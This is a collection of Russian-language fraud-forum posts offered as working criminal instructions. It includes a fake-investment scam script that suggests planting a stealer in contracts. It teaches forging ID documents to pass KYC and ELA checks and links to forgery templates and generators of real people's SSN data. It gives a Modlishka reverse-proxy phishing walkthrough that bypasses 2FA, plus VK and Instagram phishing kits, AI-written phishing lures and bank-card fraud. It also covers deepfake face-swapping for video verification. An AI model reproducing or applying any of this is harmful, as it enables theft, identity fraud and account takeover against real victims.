Здесь половина будет думать или искать деньги, а человек 5 -6 будут готовы инвестировать. Останется только взять у них доки данные для договора, и уточнить в какую инвест - группу они желают инвестировать. Прописать все в договоре и отправить им на подпись. После подписания они вам скидывают деньги на Кошелек. В отчетку следующего дня вставить данные сотрудника чтоб он также видел свой доход. Слив происходит довольно просто вы просто повышаете РПИ (НУЖНО ДЕЛАТЬ НЕ РАНЬШЕ ЧЕМ ЧЕРЕЗ 7 – 10 ДНЕЙ) на 40 процентов в один день, а на следующий доводите до 74-78%( только делайте это с несколькими людьми той же инвест группы). И в итоге просто пишете о том что инвест –проект прогорел и они все потеряли свои вложения (здесь будут и такие которые захотят еще инвестировать, я их называю «игроки» ). Вы также можете предложить «отбить свои деньги» путем новых инвестиций в группу повыше или пониже. Мой результат
Учимся читать между строк – и будет счастье))
С Вами был, cryptobot
Псы: Для полной красоты проекта и более быстрого улома, я поднимаю сайт:
"закрытый инвест проект", где только форма авторизации, а дальше уже на
бутстрапе не большая админка, где работникам проще сотавлять письма и следить
за всей статой проекта.
Псы2: тут уже полет Вашей фантазии, можно закрывать всех лодером/стиллером в
доке на подпись, как пример.
Система, телевидение, общественное мнение, СМИ — все настроены против тебя.
Они впиваются в твое сознание, как змея в свою жертву, донося то, что нужно
им.
Выращивается целое поколение людей,атакованных антивеществом на тему успеха. Таких 95%. Поэтому, скорее всего, ты один из них. Но не переживай, это лечится.
Молодой парень на х5 — мажор, сын богатых родителей. Взрослый мужчина на черном Гелендвагене — бандит, ради денег убил не одного человека. Симпатичная девушка за рулем Каена — содержанка, спит с богатым дедом.
Предприниматель с деньгами — мошенник, вор, не иначе. Человек, рaссказывающий о тeме для заpaботка — цыган, знаниями никто дeлиться не станет. Одна тeма для заpаботка слишком «мелких масштабов» для тебя, другая — требует слишком много времени. Да и вообще время нестабильное, а тема «умирает».
Система помещает человека в клетку с колесом, как хомяка, и он вынужден всю
жизнь бежать и не может остановиться
Или, если угодно, она – эта бездушная и убийственная система, дает тебе лопату
и мотивирует копать самому себе могилу, говоря, что это — твой удел, твоя
жизнь. А ты и рад. Любые попытки выбраться из этого, стать предпринимателем,
стать независимым, гнуть свою линию — это pазвод.
Но никто не говоpит, что настоящий развод — это 12 лет школы, 5 лет института , 300.000 рублей за весь период образования (а то и больше) ради того, чтобы на выходе получать 10-20 тысяч в месяц. И даже не по специальности. А диплом, который стоил кучу времени, сил и бессонных ночей интеpесен только подругам твоей мамы, которые меряются оцeнками своих детей.
Настоящий pазвод — это отдать 40 лет работе на государство, чтобы в конце полyчить подачки в виде пенсии, которая едва покрывает коммунальные расходы.
Настоящий pазвод — это кредит под 20% годовых с пунктами прописанными мелким шрифтом, который заставят тебя бежать в этом хомячковом колесе быстрее и каждый день засыпать со страхом: вдруг уволят, вдруг стабильности не будет, вдруг кризис. Нет возможности зaплатить? Продaжа долга коллекторам, звонки родителям, угрозы, страх.
Настоящий paзвод — это ипотека, ведь «нужна своя крыша над головой». Конечно, ипотека — это выгодно. Ведь что может быть более выгодным, чем добровольно надеть на себя кандалы и приковать к одному месту жизни на 20 и более лет. Тому самому городу с раздолбанными дорогами, серыми улицами и злыми людьми.
Настоящий pазвод — это ежедневное внушение страха, которое ты даже не замечаешь. Предприниматели — мошeнники, paзводилы; бизнес — это риск, главное — стабильность. Бойся Бога, бойся правительства, бойся нaлоговой (даже если все плaтишь), бойся коллекторов. Страх, страх и еще раз страх.
Настоящий pазвод — это внушение потребительства, когда у тебя нет денег на хорошую зимнюю куртку, а тебе внушают, что вышел новый айфон и появились изогнутые телевизоры, и это просто must have для каждой хрущевки.
Жизнь не по средствам и добровольный хомут на шее — вот, где настоящий
рaзвод
Вся жизнь по навязанному сценарию — вот, где настоящий развод. Смерть с
осознанием того, что ты увидел всего 10 стран — вот, где настоящий развод. Всю
жизнь бояться чего-то — вот, где настоящий развод. Ни разу не рискнуть — вот,
где настоящий развод.
Вот, где видит настоящий развод успешный человек. Это очень кратко и бегло, чтобы ты понял суть вещей, и мог начать меняться. Я не могу в одной стaтье передать все подводные камни, все нитки, за которые дергают «старшие братья».
Но я могу пpeдложить тебе возможность первый раз в жизни воспользоваться тем, что реально работает, реально приносит результат и перемены, возможность начать свое дело и возможность сменить окружение.
Основные вопросы:
-С чего рисовать? Пытаться фотошопить jpeg из гугла или купить шаблон?
Ответ: Купить качественный шаблон у хорошего продавца. Более того, после просмотра оригиналов документов вы поймёте что в большинстве случаев даже хорошие шаблоны нужно поправлять.
-Хватит ли просто сохранить фотографию в jpeg и отправлять на верификацию?
Ответ: Нет, фотография должна пройти чистку EXIF, далее стоит правильно натянуть на неё EXIF устройства (с которого она якобы делалась), сравнять участки шумов и компрессии на фотографии (чтобы обмануть ELA-анализ), назвать фотографию правильно (как будто она сошла со сканера или телефона), и тогда уже можно отправлять.
В этой статье хочу обратить ваше внимание на ВОЗМОЖНОЕ несовершенство ваших отрисовок и пройтись по главным пунктам, которые могут вас выдать.
На что обратить внимание при отрисовке?
Трекинг.
Расстояние между буквами - трекинг. Под словом "родной" я понимаю стандартный
трекинг, уже установленный в НОРМАЛЬНОМ шаблоне. Шаблоне, который не придётся
переделывать под себя.
Потертости.
Добавляем боевые раны. Здесь всё просто. Часто встречаются люди, которые
придают картинке некую "кукольность и напомаженность". Если это карта, то
карта должна быть с царапинами. Если это фото прав на столе - нужно добавить
блик от камеры (если метаданные хотите выставлять под фотоаппарат). На скрине
карточка, разделённая на 2 половины: есть и нет царапин. После того, как
кинете царапины, уменьшите непрозрачность их слоя минимум до 70%, чтобы ваши
царапины не казались следом танковых гусениц, а просто старыми затёртостями от
нОски.
Качество фотографии + метаданные.
Всегда сопоставляйте качество фотографии и её метаданные. Если у вас будут
прописаны метаданные от камеры за 70000р, а качество картинки будет как у
вебкамеры за 500 - сушите веник, а заодно и вашу отрисовку.
Тиснение/глянец.
Никогда не забываем сопоставлять не только шрифты, трекинг и прочие атрибуты,
но и "выдавленность-вдавленность" букв на документе, простите за
непрофессиональные формулировки. Не знаю, сможете ли вы рассмотреть на правой
части картинки, но там хорошо ясно что буквы на документе печатаются методом
"вдавливания" их в пластик. А значит, нам нужно суметь смоделировать это в
фотошопе. И теперь сравните это с левым паблик- образцом.
Фото.
Ищем изображение для рисовки ТОЛЬКО на нестандартных языках. Например,
тайский. Если вы думаете, что достаточно загуглить "фото на паспорт" или
"passport photo" и взять любую фотографию с верхних страниц поиска - вас
побреет антифрод, потому что таких отрисовщиков к ним стучится в день
достаточно много. Также, НИКОГДА не используем фотографии которые УЖЕ есть в
шаблоне (некоторые шабы идут с 10-20 фотками, которые нужно просто включить
нажав на слой). Если вы занимаетесь отрисовкой, перед тем как брать клиента в
работу - спросите под кого нужно рисовать документ. Например, чтобы отрисовать
паспорт под 65 лет женщину из Америки мне понадобилось несколько часов, так
как качественных фотографий американских пенсионерок в профиль я почти не
нашёл.
Генератор данных для паспорта и DL.
Если у христиан есть библия, у мусульман - коран, то у отрисовщиков есть этот
сайт:
https://www.elfqrin.com/usssndriverlicenseidgen.php
Здесь вы можете просто вбить данные с фуллки под вашего кх и получить готовые
данные для вставки в паспорт или DL.
Подделываем подпись.
Идём в гугл, вбиваем "signature font" и находим много сайтов с шрифтами
подписей. Многие из них окажутся некачественными, но это никогда не остановит
того кто намерен делать бабки на карже. Поэтому перебираем-перебираем.
Название документа.
Отрисовку советуем называть так, как будто она только что сошла с камеры,
телефона или сканера. DSC_2123, IMG_1234, и тд.
Положение лица на фото.
Держите пропорции лица, процент занимаего места и прочие требования к фото для
документа, в каждой стране они свои. Но в общем и целом, отличаются не сильно.
ELA-анализ.
Пожалуй, самый важный пункт этой статьи. Когда вы научитесь гененировать MRZ-
коды, данные SSN, DL и прочие атрибуты поддельных документов, когда вы
научитесь доводить всё до мелочей, вы всёравно будете безоружны перед одним из
тестов фотографий, который вмиг запорет вашу отрисовку. Это ELA-анализ, он
проверяет степень сжатия разных участков фотографии. Это некачественная
отрисовка. Анализ показывает, что фон, паспорт и фотография в нём склеены из
разных частей.
Вот пример качественной отрисовки, которая пройдёт все тесты и верификации
(при условии точного заполнения). Текстура сжатия однородная, ничего не
выбивается из общей картины анализа.
Самое главное - не запороть ELA-анализ, так как им пользуются сейчас
практически все конторы мирового уровня, которые давно научились ловить
неопытных наивных отрисовщиков.
Постоянно скачивайте и пересматривайте оригиналы из интернета, сравнивайте их со своими шаблонами. Даже если у вас начертание шрифта Light вместо Regular (а они почти похожи), это сможет вас выдать при детальном рассмотрении отрисовки. Чтобы сравнить шрифты с оригиналом, приближайте размер до максимума и рассматривайте мельчайшие детали по которым шрифты вашей отрисовки и оригинала должны совпадать.
Главное, на что чекают боты верификации, это с чего сделано селфи, какой
аппарат, вебка, камера телефона ноута. И как сделан док.
Немцы селфи они делают обычно в сан узлах. Доки на столах ( в быту обычно
стеклянные столики на них 80% айдишек ), права на капоте машин.
У US/UK фоткают сразу, на коленке, в авто, в маге, на столе, в руке часто.
Если не в руке, то обязательно либо ковролин, либо паркет, либо плетенка из
шерсти, которая лежит на кроватях, диванах, под кофейными столами. Так же
норма на ковролине фоткать DL с ногами, стоя на самом ковролине дома ( иногда
на сером или даже белом) , в ботинках, не разуваясь. Тупо в гавнодавах под
ноги кинули права, ковер светлый.
Лишь опыт с документами, дает вам эти понимания. Есть 2 траектории проверки
доков. Это человеко фактор, люди, и роботы, считывающие MRZ код тот же на
паспорте, либо на правах номер.
Под заказ, рисовал DL обе стороны, потом распечатывал, ламинировал, и фоткал (
ну это нормальная схема на сегодня, правильная ). Чтобы с фильтрами от ФШ не
затупливать, сразу распечатал сфоткал. Ну и у людей не входили доки, точнее
половина доков при ручной проверке отсеивалась.
Оказалося он фоткал DL на полу, где ламинат ( на гавно китайский смартфон ). У
амеров нету в домах ламината, линолеума. У них паркет. Это равносильно, что
сделать негра с селфи DL а сзади ковер на стене будет.
Подсказал ему на столе фоткать, рядом распечатывать газету того штата города
где дл, чтоб уголок был виден на фотке дока, типо кружка, дл, угол нью йорк
таймс, ключи от авто и на авито прикупить бу айфон для фоток.
Дело пошло в гору, доки начали хавать все. Так же пошли в гору пруфы на столе
или рядом углы билетов на концерты, брелки от форда или шевроле, чек за мусор
вывоз.
Так то )
Вот пример гавно селфи, которое хавает любая БК, и крипто сервис на изи. Без
заморочек.
Качество видите да сами? Фотку на айди и саму девушку тоже видите? А им похуй,
никто на доке на себя не похож, никто. Но спецом сделано такое, ну в текст не
уложиться почему. Ну они такие шлют, каждый день. Я в своей работе делаю так,
чтобы я был в толпе, в толпе холдеров, которые каждый день такое присылают.
Взять к примеру ту же Испанию. Кто работал по ней, либо видел док DNI по
Испании. Были случаи, когда требовалося отрисовать челов 1950-1960 годов, ну и
я по наивности че делал, гуглил лица, и т.д. брал с шабов наработаных людей,
кто такого ДОБа. И доки не заходили в испанский крупный шоп.
Потом глядя только на людей, на доки, на возраст я понял, что у них бабушки и
дедушки того же 1930 года рождения выглядят как женщины наши в 55-60 лет. И
когда я омолодил лица, и взял док не просто как у СНГ на паспортах у людей, на
лице боль жизни, надгробное фото, а улыбающихся людей, у которых все удалося,
доки начали залетать. Я понял мышление сапов сервисов и шопов региональных.
Они каждый день видят доки, сверяют, и тут им подкидывают не то что написано в
доке, не тех людей.
Проше, вставить фейс дропа, вбить данные в пас либо права что требуются,
распечатать, заламинировать, либо смотря от дока купить бумагу, тогда
ламинация не требуется. Берете у кого на постоянке требуют селфи, берете 4-6
человек рандом муж/жен пол, фоткаете их, редактите данные на доке, печатаете,
даете дропу в руки, фоткаете, даете ему на боярышник, уезжаете.
https://t.me/joinchat/AAAAAEeN-TL0Um27fuWwOw
https://www.dropbox.com/s/vxqor2mjt3apg4m/Отрисовка.rar?dl=0
https://mega.nz/folder/odFhFYTZ#-0lv3xS2uWqB_n-oMNphLw
https://yadi.sk/d/ixmWew9RSxncPQ
ID и Шаблоны Всех Стран. Сканы Паспортов.
https://mega.nz/folder/blcmiK4K#13AMUP1TUYv2EvooLmLH9w
https://mega.nz/folder/b09URDAS#Zat7CeKqIkmrvKOBqt6hXw - Австралия
https://mega.nz/folder/38FU0YxY#x5rSbdFHQuFrK6Mal_pFAw - Шаблоны, другие
страны.
https://mega.nz/folder/6odDVA5B#ojjzeFrfCdO1dmCRX_Pm7w - SSH ETC
пак на 19 гигов ВСЕ СТРАНЫ
https://mega.nz/folder/68M23CYL#OIq3rmXMy7XeVvDPHvS8QQ
Ключ дешифрования OIq3rmXMy7XeVvDPHvS8QQ
макет вод.удостов РУ .cdr, rutracker.org/forum/tracker.php?nm=CorelDRAWhttps://anonfiles.com/5eT9B8w9p2/PSD_rar
Делюсь с вами бесплатным ботом отрисовщиком, в отличие от остальных в нём
реально качественная отрисовка. Есть накладные сдек и компании, различные
переводы и скрины с банков и куча других полезностей, а так же функция очистки
изображения от метаданных
Сам бот - @Otrisovka_Robot
Hidden content for authorized users.
В этой статье я предлагаю рассмотреть метод кражи учетных данных пользователя, используя технологию reverse - proxy, которая позволит нам обойти двухфакторную аутентификацию.
Для этого мы будем использовать и настраивать инструмент, довольно известный в определенных кругах, под названием Modlishka.
Modlishka - мощный и гибкий обратный HTTP-прокси. Он реализует совершенно новый и интересный подход к обработке потока HTTP-трафика на основе браузера, который позволяет прозрачно проксировать многодоменный целевой трафик, как TLS, так и не-TLS, через один домен без необходимости установки какого-либо дополнительного сертификата на клиент.
Что именно это означает? Короче говоря, у него просто большой потенциал, который можно использовать во многих сценариях использования.
С точки зрения безопасности Modlishka в настоящее время может использоваться для:
Modlishka была написана как попытка преодолеть стандартные ограничения обратного прокси и как личный вызов, чтобы увидеть, что возможно при достаточной мотивации и небольшом дополнительном времени на исследование.
Достигнутые результаты оказались очень интересными, и инструмент был изначально выпущен, а затем обновлен с целью:
Modlishka была в первую очередь написана для задач, связанных с безопасностью. Тем не менее, это может быть полезно в других сценариях использования, не связанных с безопасностью.
Эффективное проксирование!
Features
Общие:
Связанные с безопасностью:
Installation
Последнюю версию исходного кода можно загрузить здесь (zip) или здесь (tar).
Получите код с помощью go get:
Code:Copy to clipboard
go get -u github.com/drk1wi/Modlishka
Осуществляем пробный запуск:
Code:Copy to clipboard
Modlishka
Вывод больше информативный, чем практический, но это указывает на отсутствие ошибок при установке.
Проверяем работу непосредственно обратного прокси сервера, выполняем следующую команду:
Code:Copy to clipboard
Modlishka -config /usr/local/Projects/pkg/mod/github.com/drk1wi/\!modlishka@v0.0.0-20200628043644-00a2385a0952/templates/google.com_gsuite.json
При переходе на локальный адрес сервера, где работает Modlishka, мы должны получить редирект на стартовую страницу Google.
Достигается это следующим образом.
Страница, которую мы запрашиваем содержит:
Code:Copy to clipboard
<a href="http://google.com">Found</a>
Двигаемся далее, создаем SSL сетрификат:
Code:Copy to clipboard
openssl genrsa -out MyRootCA.key 2048
Code:Copy to clipboard
openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem
В итоге имеем два файла.
Копируем содержимое этих файлов в autocert.go.
Собираем заново.
Code:Copy to clipboard
make
Затем необходимо импортировать сертификат в браузер пользователя (это мы проворачиваем в тестовой среде), ниже разберем настройку с выделенным сервером, и "чистым" фишингом.
Представляем, что всё прошло идеально, и можно засылать фишинговую ссылку пользователю.
Перед тем как начнем, необходимо заглянуть в templates в директории с Modlishka. Нам доступно только два темплейта:
Могу сразу сказать, что доступные нам дефолтные шаблоны Google и Microsoft не сработают, так что нам остается научится делать свои шаблоны.
Прелесть Modlishka, в том, что нам не нужно утомительно писать свой клон сайта, или делать что-то в духе phislets с Evilginx.
Темплейт представляет из себя json файл, просто копируем его и меняем под свои нужды.
Необходимо изменить пять ключевых параметров:
"target" - Целевой сайт.
"trackingCookie" - Название параметра хранящего сессионный токен:
"log" - Имя файла, куда будут падать логи.
"credParams" - Сюда необходимо поместить в закодированном в Base64 виде,
имена параметров + резулярные выражения которые будут характеризовать вводимые
символы.
Перехватываем запрос авторизации на сайте.
Здесь нас интересуют два параметра:
Пишем регулярные выражения в духе:
И кодируем это всё в Base64:
Закидываем это всё в наш новый json темплейт.
"plugins" - Включаем все доступные плагины - "all"
Запускаем Modlishka следующей командой:
Code:Copy to clipboard
./proxy -config /usr/local/Projects/pkg/mod/github.com/drk1wi/\!modlishka@v0.0.0-20200628043644-00a2385a0952/templates/protey.json
Теперь, при переходе по ссылке:
Code:Copy to clipboard
https://loopback.modlishka.io
Мы попадаем на целевой сайт, где вводим учетные данные, которые успешно передаются атакующему.
К тому же, в панели управления Modlishka по адресу:
Code:Copy to clipboard
http://loopback.modlishka.io/SayHello2Modlishka
Мы получаем контроль над сессией жертвы, в этом и заключается принцип обхода 2FA, мы полностью контролируем сессию получив данные о сеансе пользователя.
Выглядит неплохо, но что если у атакующего нет возможности добавить сертификат в браузер жертвы?
Попробуем разобраться.
Для начала вернемся к редактированию конфигурационного файла. Добавим немного реализма к происходящему.
Жертва должна быть перенаправлена куда-нибудь после входа в систему, которая может быть, например, реальной учетной записью на форуме. В демонстрационных целях мы и будем рассматривать этот вариант.
Code:Copy to clipboard
"terminateRedirectUrl": "[URL='https://google.com/']https://google.com[/URL]"
Затем нам понадобится сервер с "белым" IP-адресом, на котором будет располагаться Modlishka, можно использовать роутер + пробросить порты, если IP "белый" статический.
Будем считать, что всё это у вас уже есть и настроено. Покупаем созвучный домен, стараемся максимально мимикрировать под целевой сайт.
В моем случае, это беспалевный - phishing.protey.net
Далее раздобудем для него сертификат, можно купить, но для тестов сгодится и LetsEncrypt.
Code:Copy to clipboard
certbot certonly --manual --preferred-challenges dns --manual-public-ip-logging-ok -d '*.phishing.protey.net' -d phishing.protey.net
Следуя инструкции, добавляем TXT запись и получаем весь набор сертификатов.
Нас интересуют два файла:
Копируем их в папку с Modlishka.
Вернемся к конфигурационному файлу, параметры:
Code:Copy to clipboard
"cert"
"certKey"
Принимают значения в одну строку, для этого на необходимо немного изменить файлы сертификатов:
Code:Copy to clipboard
sed -i ':a;N;$!ba;s/\n/\\n/g' privkey.pem
sed -i ':a;N;$!ba;s/\n/\\n/g' fullchain.pem
Затем просто копируем их содержимое, и подставляем в параметры, чтобы получилось так:
Ещё немного правок в конфигурационный файл:
"proxyDomain": "phishing.protey.net",
"trackingParam": "ident" - Для того, чтобы сохранялсь куки жертвы.
"terminateTriggers": "/whats-new/", - Нет необходимости держать жертву
постоянно через прокси, создаем триггер, который при переходе на страницу "Что
нового", будет обрывать сессию и перенаправлять пользователя на легитимный
сайт.
Убеждаемся, что у нас всё готово к фишингу:
Запускаем Modlishka и делимся ссылкой с пользователем, чьи учетные данные нам хотелось бы получить.
Code:Copy to clipboard
./proxy -config /usr/local/Projects/pkg/mod/github.com/drk1wi/\!modlishka@v0.0.0-20200628043644-00a2385a0952/templates/protey.json
Результатом будут перехваченные учетные данные пользователя, а затем перенаправление пользователя, на реальный сайт.
В консоли управления Modlishka мы получаем всю необходимую информацию о сессии пользователя.
Вывод: Очень простой, универсальный и гибкий инструмент, однозначно полезен.
Автор Vander, источник protey
есть ли кто-нибудь, кто знает способ обойти 3D SECURE OTP проверку кредитных карт.
Как взломать аккаунт Вконтакте с помощью фишинга
Как взломать аккаунт Вконтакте с помощью фишинга? Для начала нужно втереться в доверие нашей потенциальной жертве. Напишите ей в личные сообщение "Привет" поинтересуйтесь как дела, как настроение. Не задавайте вопросы личного характера, например "В каком городе ты живешь?" "Какой у тебя номер телефона?". Эти вопросы могут отпугнуть жертву. Правильно было бы несколько дней активно общаться с жертвой, втираться в доверии, а потом попросить проголосовать, или зайди и авторизоваться по вашей ссылке. Если вы очень занятой человек, ну или просто не получается загрузить фейк Вконтакте на хостинг вам стоит обратить внимание на сниффер. В сниффере собраны различные фейковые сайты, и всё что вам остаётся - это заставить жертву перейти по ссылке и ввести свои данные. Удачных взломов, мой юный друг. Перед тем как ввести свои данные на сайте проверяйте подлинность домена, чтобы не попасться на фишинг сайт.А вот и обещанный сниффер [CLIKE] https://snif-f.ru
Spoiler: Для взлома перейдите по ссылке, зарегистрируйтесь и заставьте жертву авторизоваться
[/CLIKE]
Spoiler: Важно
Не пишите со своей основной странице Вконтакте. Лучше купите левый аккаунт Вконтакте, желательно авторег (автоматически зарегистрированная страница)
Способ актуальный и рабочий на 18.09.2019
Карта подойдет как для грязи, так и для личного хранение средств.
Бонусная карта Роснефть "Семейная команда"
Карта выдается при заправке, на любую сумму, не предложили - спросите о каких
либо акциях и бонусных картах. Вам дают анкету, Вы заполняете, формальные
данные, типа: ФИО, адрес, телефон, никто эти данные не проверяет, лучше
указать действующий телефон. Паспорт не просят, пишите, что хотите. Все, дело
сделано, карта у нас. Получаем вот такой пакет:
По ней можно расплачиваться за покупки (хранить на ней деньги) в любом
банкомате или магазине и на АЗС
Да-да, все по настоящему. Даже как в банке получаете вкладыш с информацией по
карте.
Много.ру(открытие), Payoner присылают в почтовый ящик на сканы
Могу порекомендовать <https://www.viabuy.com/the-prepaid-mastercard-in-gold- or-black.html>
- они дают реальный немецкий IBAN и карту к нему. Можно даже на граждан РФ, но вот высылают только по Европе и нужно proof of residence предоставлять (например, счет за телефон, за коммунальные услуги и т.д.), но этот счет рисуется на раз два, и это не палят.
Что касается отрисовки паспортов, то я сильно сомневаюсь, что это зайдет. Ибей все же не лохи зеленые. А общаясь с большинством отрисовщиков становится ясно, что их творчеством можно обмануть только совсем молодых зеленых. Что тут говорить, что даже до недавнего времени сам не знал, что такое сигнатуры компрессии в jpeg-файле и как по этим сигнатурам легко выпаливают фотошоп.
Например есть сайт на обычном хостинге,который ложится без проблем хоть через тот же самый слоулорис(на самом деле без разницы) какой шанс того,что владелец заплатит,если постоянно ддосить его?Ведь все знают,что если заплатить вымогателю один раз,то он будет шантажировать тебя всё время
Прочитав новость https://xss.is/threads/55036/ зацепила идея, немного погуглил и собрал рабочею схему для создания в образовательных целях свежих текстов для фишинг писем.Небольшой мануальчик.
Имеем старый заюзанный текст разводки который можно подогнать под любую тему
Code:Copy to clipboard
In order to provide you with the most secure sign in experience, you are about to sign in from an unrecognized device. To access your account, please use a web browser on a computer.
Данный текст довольно замылен и палится почтовыми фильтрами.Вместо использования спинтакса и прочих банальных способов зайти в инбокс и зацепить холдера попробуем использовать ИИ.
Регаемся на https://www.copy.ai/ рега простая, есть триал которого для
тестов вполне достаточно.
После реги видим такую картину
Пробуем сгенерировать новый текст под Yahoo
Получаем на выходе
Некоторые текста не плохо выглядят, в переведенном виде
Жмякаем Make more рядом с понравившимся вариантом и получаем более точные варианты по смыслу
Итог : сервис не всегда точно выдает по смыслу текста, но частенько попадаются интересные варианты.Можно вручную сделать новые текста старых писем, либо автоматизировать генерацию каждого письма через API( апи не смотрел, но уверен такая возможность реалистична).
Ооо да, подгоняю жирок и сливаю вам приватный фишинг инстаграма который стоит 1.5к, вообщем кайфуйте ?
Подробнее:
- Написан грамотно и качественно.
- Очень гибкий фиш и полная работоспособность фиша.
- Сайт выполнен отлично, есть переливание цветов.
- Страница входа сделана 1в1 с Instagram.
- Возможна смена любых значений на странице.
- Люди входят через свой Instagram, для того чтобы подключится к партнерке.
- Данные идут в Telegram.
Spoiler: Скрин
Spoiler: Установка ?
Требования к хостингу:
Версия PHP 7.0 и выше, Apache (рекомендуется)
База данных MySQL (желательно без ограничений)
Установка скрипта:
1. Загрузите все файлы на сервер
2. Импортируйте базу данных на свой хостинг
3. Настройте скрипт на свои данные
- Данные от бота в файле 'config.php'
- Данные от базы в файле 'db.php'
4. Активируйте Webhook для бота, для этого просто перейдите по ссылке:
Внимание! Для того, чтобы все корректно работало вам нужно иметь SSL-
сертификат!
Ссылка (подставьте свои данные): https://api.telegram.org/bot<ТОКЕН_БОТА>/setWebhook?url=<ПУТЬ_К_БОТУ>
Если все будет успешно, то вы получите такой текст в окне:
PHP:Copy to clipboard
{"ok": true," result": true,"description": "Webhook was set"}
Если у вас уже было все установлено, то вы получите ответ:
PHP:Copy to clipboard
{"ok": true," result": true," description":" Webhook is already set"}
Если у вас получается другой ответ, то попробуйте его перевести и понять смысл
ошибки.
Если у вас что-либо не работает, убедитесь, что вы не тупоголовый петух.
Spoiler: Видео инструкция
Spoiler: Скачать
You must have at least 5 reaction(s) to view the content.
Если нужен будет VT скину, но там чисто код, не вижу смысла, шеллов нету!!
Вы меня знаете, от лайков я кайфую так что не будьте строги дайти кончить, чем больше лайков тем сильнее мой оргазм ?
You must have at least 1 message(s) to view the content.
Тут тебя ждет слив банка без сверки по именам с VCC которая лезет в Ру, с относительно простой регой, хорошими лимитами и долгим сроком жизни. Так что рекомендую как можно быстрее начать работать по этой теме, пока она еще жива, думаю до того момента пока куррент закрутит гайки можно легко успеть срубить жирную котлету каждому.
Сегодня я расскажу тебе о том как работать с малоизвестной для широких масс
вцц конторой - Current
Current - спасибо что живой
Тебе нужен телефон, айфон или ведро не важно, разница в том что на айфоне ты
НЕ сможешь клонить приложения, а банк этот клонится.
Банк лог, в идеале цу или фцу, если не тупой то легко сможешь достать список
линков которые точно сливаются у обнал сервисов которые в свою очередь налят
этим способом. Спросишь как понять что они налят этим способом? Routing number
этой конторы: 091302966, Account number начинается на 304, бин VCC 411568.
Сверь, и никаких проблем.
Качай приложение Current
https://play.google.com/store/apps/details?id=com.current.app
найти в сторе можно только с USA аккаунта, что бы сделать USA аккаунт нужно
привязать в Google Play USA картон. Вход только с USA айпи, рекомендую open
vpn или пптп протокол, как вариант vpn (мне нравится yoga)
Далее ты увидишь такую картину:
Требуется реал юса номер (тн и гв не подходят), зато подходит сервис
https://getsmsvf.com/ или любой другой, на твой вкус.
Верифай ру почту. (Никаких Mail.ru и Yandex, только домены использующиеся в
юсе, например google)
Дальше все по стандарту, вводишь фулку, доб, ccн, и тебя выбивает на
фотовериф, выбираешь Driver License. На этом шаге стоит остановиться
конкретнее, старички могут идти дальше, а вот зеленым стоит рассказать как
верифнуть любую контору. Итак, тебе понадобится:
Бесплатные FullInfo,генератор документов,инструкции по баркодам
https://generatormr.com/full-info#work-box
Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год
Сгенерировать МРЗ код/Персональный номер для паспорта USA и других документов.
Получить инструкцию по Баркодам и их содержимому в Водительских удостоверениях USA/
Отдельно можно получить бесплатно FULL INFO в телеграмм боте
https://web.telegram.org/#/im?p=@generatormrfullinfobot
https://generatormr.com/full-info#work-box
You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
Database 2017-2018 year
To generate SSE code/Personal number for the US passport and other documents.
Get instructions on Barcodes and their contents in the USA Driver's licenses/
You can also get FULL INFO for free in the telegram bot
https://web.telegram.org/#/im?p=@generatormrfullinfobot
Генерирует FULL и SSN! Реальные фулки, из базы какой-то дергает. чекал лично руками, все валидные, бывает из-за того что такая фулка уже есть и она в лимите! Если собираетесь использовать их, то пробивайте бг, чтобы получить более точную инфу!
Цветной принтер, рекомендую Epson или HP
Ламинатор, бери дешевый, без разницы
Матовая фотобумага, чем плотнее тем лучше
Пленка для ламинирования
Рисовать лицо совего дропа
Берем данные КХ под вериф на бирже Делаем себе документы, а точнее
распечатываем фейк документ с фоткой, можно заламинировать. Далее берем
напечатанный документ в руки и следуем инструкции. Меняем лицо - получаем
вериф.
https://github.com/alievk/avatarify - позволит тебе подменить лицо в
реальном времени, во время видеозвонка в скайпе, или зуме.
Инструкция по установке на Windows
git clone https://github.com/alievk/avatarify.git
cd avatarify
scripts\install_windows.bat
После успешного завершения, скачиваем доп.ресурсы с https://drive.google.com/file/d/1L8P-hpBhZi8Q_1vP2KlQ4N6dvlzpYBvZ/view, https://yadi.sk/d/lEw8uRm140L_eQ/vox-adv-cpk.pth.tar, https://mega.nz/file/R8kxQKLD#036S-bobZ9IW-kNNcSlgpfJWBKSi5nkhouCYAsxz3qI (на ваш выбор).
Потом размещаем vox-adv-cpk.pth.tar в папку avatarify (не распаковываем).
Папка avatarify находится в C:\Users\{username}:
После этого, если вы уже закрыли консоль miniconda, то открываем её снова,
прописываем:
cd C:\Users\username\avatarify
И после этого прописываем следующее:
run_windows.bat
Убедитесь, что ваша ОЗУ не забита, т.к при первом запуске программа докачает и
установит нужные ей элементы:
После успешного запуска на экране появятся 2 окна, в одном будет изображение с
веб камеры, в другом - с Avatarify:
Управление:
1-9: переключение между лицами;
0 (ноль): включает и выключает отображение Аватара;
A/D: предыдущий/следующий аватар из папки;
W/S: приближение камеры;
Z/C: настройка непрозрачности наложения Аватара;
X: сбрасывает настройки,перед использованием помогает;
F: поиск окна и опоры;
R: зеркальное отображение с веб камеры;
T: зеркальное отображение аватара;
I: показать FPS.
Управление Аватаром
Вот основные принципы управления вашим аватаром:
Выровняйте свое лицо в окне камеры как можно ближе по пропорциям и положению к целевому аватару. Используйте функцию увеличения/уменьшения масштаба (W / S клавиши). Когда вы выровняетесь, нажмите "X", чтобы использовать этот кадр в качестве ссылки для управления остальной анимацией.
Используйте функцию наложения (клавиши Z/C), чтобы максимально приблизить выражение вашего лица и лица аватара.
Кроме того, вы можете нажать "F" для программного обеспечения, чтобы попытаться найти лучшую позицию. Это замедлит частоту кадров, но пока это происходит, вы можете продолжать двигать головой: окно предварительного просмотра будет мигать зеленым цветом, когда он обнаружит, что ваша поза лица ближе соответствует аватару, чем та, которую он использует в данный момент. Вы также увидите два числа: первое число - это то, насколько близко вы в данный момент выровнены по Аватару, а второе число-насколько близко выровнена система отсчета.
Вы хотите получить первое число как можно меньше - около 10 обычно является хорошим выравниванием. Когда вы закончите, нажмите "F" еще раз, чтобы выйти из режима поиска опорных кадров.
